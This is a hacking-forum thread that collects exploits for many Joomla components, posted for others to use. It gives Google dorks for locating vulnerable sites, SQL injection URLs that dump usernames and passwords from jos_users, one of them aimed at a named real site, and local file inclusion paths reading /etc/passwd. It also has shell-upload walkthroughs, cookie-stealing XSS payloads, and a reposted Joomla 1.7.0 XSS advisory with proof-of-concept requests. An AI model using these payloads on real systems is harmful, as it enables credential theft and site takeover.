spyman

_.-*Joomla Bug Bazaar, Mixed (can't be separated; it's all jumbled together)*-._

52 posts in this topic

Joomla Component com_yellowpages SQL Injection Vulnerability

Dork = inurl:/index.php?option=com_yellowpages?
############################################################
--- SQL Injection Vulnerability ---
SQL Injection Vulnerability component "com_yellowpages"
http://find.co.ke/newfind/index.php?option=com_yellowpages&cat=1923[sql]
############################################################
===[injection]===
[sql] = http://find.co.ke/newfind/index.php?option=com_yellowpages&cat=-1 923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
############################################################


Joomla com_cggetaquote LFI Vulnerability


Name : Joomla com_cggetaquote LFI Vulnerability
Google dork: inurl:com_cggetaquote OR inurl:index.php?option=com_cggetaquote
http://target.com/index.php?option=com_cggetaquote&controller=[LFI]

Joomla com_hbooking SQLi Vulnerability


Name : Joomla com_hbooking SQLi Vulnerability
Google dork: inurl:com_hbooking
SQLI:
http://target.com/hbooking/index.php?option=com_hbooking&view=roombooking&userid=[sQli]

LFI:
http://www.target.com/hbooking/index.php?option=com_hbooking&view=[LFI]


1.joomla Component Amblog 1.0 Multiple SQL Injection Vulnerabilities


name : Joomla Component Amblog 1.0 Multiple SQL Injection Vulnerabilities

SAMPLE CODE:

A) Multiple SQL Injection

http://site/path/index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version

http://site/path/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

http://site/path/index.php?option=com_amblog&task=newform&catid=-1 UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users

http://site/path/index.php?option=com_amblog&task=editform&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

http://site/path/index.php?option=com_amblog&task=editcommentform&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

http://site/path/index.php?option=com_amblog&task=savenewcomment&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

http://site/path/index.php?option=com_amblog&task=saveeditcomment&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users


B) Multiple Blind SQL Injection

http://site/path/index.php?option=com_amblog&task=editsave&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

http://site/path/index.php?option=com_amblog&task=delete&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

2.Joomla Component com_ss Sql Injection Vulnerability

name : Joomla "com_ss" Sql Injection Vulnerability

Dork : inurl:index.php?option=com_ss

http://target.com/index.php?option=com_ss&view=subcategory&id=1646277829[sql]
http://target.com/index.php?option=com_ss&view=subcategory&id=2800733730&page=2[ Blind]


Joomla com_adsmanager SQli Vulnerability

Google dork: inurl:com_adsmanager
Xploit:
http://target.com/index.php?option=com_adsmanager&page=show_ad&adid=[sQli]&catid=15&Itemid=0


1.Joomla Component com_mysms Upload Vulnerability

Xploit: Upload Vulnerability

Step 1: Register first

Step 2: Go to your profile "Mysms" option

Step 3: The attacker can upload shell in the "Import phonebook" option and it doesn't validate any file format so upload your shell
DEMO URL : http://mysms-demo.willcodejoomlaforfood.de/?option=com_mysms&Itemid=0&task=phonebook

Step 4: your shell is uploaded and now you do your job

2.Joomla Component com_zoom (XSS/Blind SQLi/SQL Injection) Vulnerability

Dork : inurl:com_zoom
 Dork: inurl:com_zoom/www/view.php?popup= catid

***********************************************
How to exploit XSS

index.php?index.php?option=com_zoom&Itemid=2&catid=2&PageNo=<script>alert(document.cookie)</script>

**********************************************

How to exploit BLSi

components/com_zoom/www/view.php?popup=1&catid=[bSi]&key=2&hit=1

*********************************************

How to exploit SQLi

components/com_zoom/www/view.php?popup=1&catid=[sqli]&key=11&hit=1


I'll try to post all of the newest Joomla bugs right here so that this becomes a complete thread.

Name : Joomla Component com_songs SQL Injection Vulnerability

Dork: index.php?option=com_songs

===[ Exploit ]===

http://target.com/index.php?option=com_songs&task=detail&id=-29+UNION SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--

1.Joomla Component com_rsform Sql Injection Vulnerability

Dork : inurl:com_rsform

::[0x01] SQL Injections ::


http://example/index.php?option=com_rsform&Itemid=[sqli]


1.Joomla Component (com_weblinks) SQL Injection Vulnerability

----Dork----
inurl:"option=com_weblinks"

==|----exploit----|==
http://{localhost}/{path}/index.php?option=com_weblinks&view=categories&Itemid=[sql]

2.Joomla Component (com_fireboard) SQL Injection Vulnerability

==|----Dork----|==

inurl:"option=com_fireboard"

==|----exploit----|==

http://{localhost}/{path}/index.php?option=com_fireboard&Itemid=[sql]


Joomla "com_equipment" Sql Injection Vulnerability

Name : Joomla "com_equipment" Sql Injection Vulnerability

Dork = inurl:"com_equipment"

===[ Exploit ]===
http://www.site.com/path/index.php?option=com_equipment&view=details&id=[sql]
or
http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&sec_men_id=[sql]


===[injection]===
[sql] = +Union+select+1,user(),3,4,5,6+from+jos_users--
[sql] = +Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+jos_users--
[sql] = +Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--


Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

NAME : Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

DorK : inurl:"option=com_jgrid"

==|Local File Inclusion|==

http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00


New Joomla bug <( Joomla Component com_ongallery SQL Injection Vulnerability)>


Here is another bug in the components of this popular CMS

Name : Joomla Component com_ongallery SQL Injection Vulnerability

DorK : index.php?option=com_ongallery

[+] ExploiT :

http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--

http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--


New Joomla bug <( Joomla Component com_dirfrm Sql Injection Vulnerability)>

Dork google: inurl:"com_dirfrm"
###############################################
Exploit:
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=[sql Injection]&id=8&Itemid=32
or
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[sql Injection]&Itemid=32
###############################################
[sql Injection]:
-> Step1:
- order by n--- False
- order by n+1-- True

-> Step2:null  Union select 1,2,3,4,...,n+1--
Eg: http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=null
union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32

-> Step3: replace display number on website
version(), user(), database
#if version SQL >=5 : try exploit with table system:
___table_name from information_scheama.tables where table_schema=database()--
___column_name form information_schema.columns where table_name=Char(name table)
#if version SQL <5: try exploit with blind SQL, blind table_name and column_name

-> Step 4: collecting information

null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--

Done!


New Joomla bug: Joomla Component com_message SQL Injection Vulnerability

G00gle Dork : inurl:"index.php?option=com_message"

Exploit:
www.target/index.php?option=com_message&contid=-118[sql]

Order by 33


1.Joomla Component com_zina SQL Injection Vulnerability

Dork :index.php?option=com_zina 

Bug : 
http://target/index.php?option=com_zina&view=zina&Itemid=9[sqli CODE]  

2.Joomla Component com_extcalendar Blind SQL Injection Vulnerability

Dork  allinurl:"com_extcalendar"      
Bug : 
http://www.site.com/[PATH]/components/com_extcalendar/cal_popup.php?extmode=view&extid=[bLIND_SQL]  


Joomla Component com_zoomportfolio SQL Injection Vulnerability

Dork :index.php?option=com_zoomportfolio

--[How to exploit]--
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]


1. Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

--[Multiple SQL Injection]-- 

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 

http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23  

1. Register on site

2. http://www.target.com/index.php?opti...sitory&itemid=[itemid]&func=addfile

3. Add your php file , example : Shell.php

4. http://www.target.com/components/com_remository_files/

5. If web server allows to see directory you can see folder example : File_image_2

6. You can find your shell in latest file_image_[latest number]

7 . Example url : http://www.example.com/components/co...00016shell.php

dork : Inurl:"index.php?com_remository"


Joomla com_adagency Persistent Xss Vulnerability

Bug : Persistent XSS :
The persistent XSS is while creating a website
   Step 1 : Register
   Step 2 : Go to the "Ads" option.
   Step 3 : Post the xss script in the ad description area and save it.
   Step 4 : Now preview your ad

Demo Url : http://joomla15.ijoomlademo.com/index.php?option=com_adagency&controller=adagencyTextlink&task=edit&cid=37


Joomla Component com_clantools version 1.2.3 Multiple Blind SQL Injection

Dork :inurl:index.php?option=com_clantools&squad= 

[ Vulnerability 1 ] 

http://www.site.com/joomlapath/index.php?option=com_clantools&squad=1+[blind SQL] 

[ Vulnerability 2 ] 

http://www.site.com/joomlapath/index.php?option=com_clantools&task=clanwar&showgame=1+[blind SQL]&Itemid=999  


Joomla Component com_taxes SQL Injection Vulnerability

Dork: inurl:com_taxes 

[x]Vulnerability: 
http://www.site.com/index.php?option=com_taxes&id=[ ] <= Sqli 

[x]exploit: 
+union+all+select+1,group_concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11+from+jos_users--  


Joomla Component Aardvertiser 2.1 Free Blind SQLi

D0rk : inurl:com_aardvertiser
[ Vulnerability//PoC ]

http://server/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view  


Joomla Component (com_jphone) Local File Inclusion Vulnerability

http://site/path/index.php?option=com_jphone&controller={LFI}
{LFI}=../../../../../../../../../../etc/passwd%00
{LFI}=../../../../../../../../../../proc/self/environ%00
D0rk:inurl:"com_jphone"  


Joomla Component com_jgen

bug:Joomla Component com_jgen

Dork:inurl:"com_jgen"



exploits:
http://127.0.0.1/Joomla Path/index.php?option=com_jgen&task=view&id=[sql Injection]


Joomla Component com_estate blind Sql Injection Vulnerability

--- SQL Injection Vulnerability ---
SQL Injection Vulnerability component "com_estate"
[sql]http://target.com/index.php?option=com_estate&task=detailed&id=25  


Posted (edited)

Here are two for 1.7

Topic : Joomla! 1.7.0 Cross Site Scripting
WLB : WLB-2011100017
SecurityAlert : None
Date : 2011-10-02
Credit : yehg
SecurityRisk : Low
Remote : Yes
Local : No
Status : Bug

History : [2011-10-02] Started
Affected software : Joomla! 1.7.0

Text :

Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities



1. OVERVIEW

Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.


4. VERSION AFFECTED

1.7.0 <=


5. PROOF-OF-CONCEPT/EXPLOIT


component: com_search, parameter: searchword (Browser: IE, Konqueror)
=====================================================================


[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456


task=search&Itemid=435&searchword=Search';onunload=function(){x=con
firm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,
101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116
,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,11
1,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode
(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&
option=com_search
[/REQUEST]


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

User Login is required to execute the following XSSes.


Parameter: extension, Component: com_categories
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_categori
es&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%
22width:3000px!important;height:3000px!important;z-index:999999;position:ab
solute!important;left:0;top:0;%22%20x=%22


Parameter: asset , Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&
view=images&tmpl=component&e_name=jform_articletext&asset=1%2
2%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;heigh
t:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;
%22x=%22&author=


Parameter: author, Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&
view=images&tmpl=component&e_name=jform_articletext&asset=&
author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!imp
ortant;height:3000px!important;z-index:999999;position:absolute!important;l
eft:0;top:0;%22x=%22


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

Upgrade to Joomla! 1.7.1-stable or higher.


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerability
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerability


#yehg [2011-09-29]

Topic : Joomla Component Juke Box 1.7 Local File Inclusion Vulnerability

SecurityAlert : 7243
CVE : CVE-2010-1352
CWE : CWE-22
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : AntiSecurity
Published : 15.04.2010

Affected Software : jooforge:com_jukebox:1.0
jooforge:com_jukebox:1.7

Advisory Content :


===========================================================================
==================================


[o] Joomla Component Juke Box Local File Inclusion Vulnerability

Software : com_jukebox version 1.7
Vendor : http://www.jooforge.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/


===========================================================================
==================================


[o] Exploit


http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]


[o] PoC


http://localhost/index.php?option=com_jukebox&controller=../../../../../../
../../../../etc/passwd%00


===========================================================================
==================================


[o] Greetz

Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===========================================================================
==================================


[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia


OK, hold on to these for now until my thanks count reaches 135. I have only posted 30% of the bugs so far. If my thanks get there, I'll post the rest.

Edited by spyman
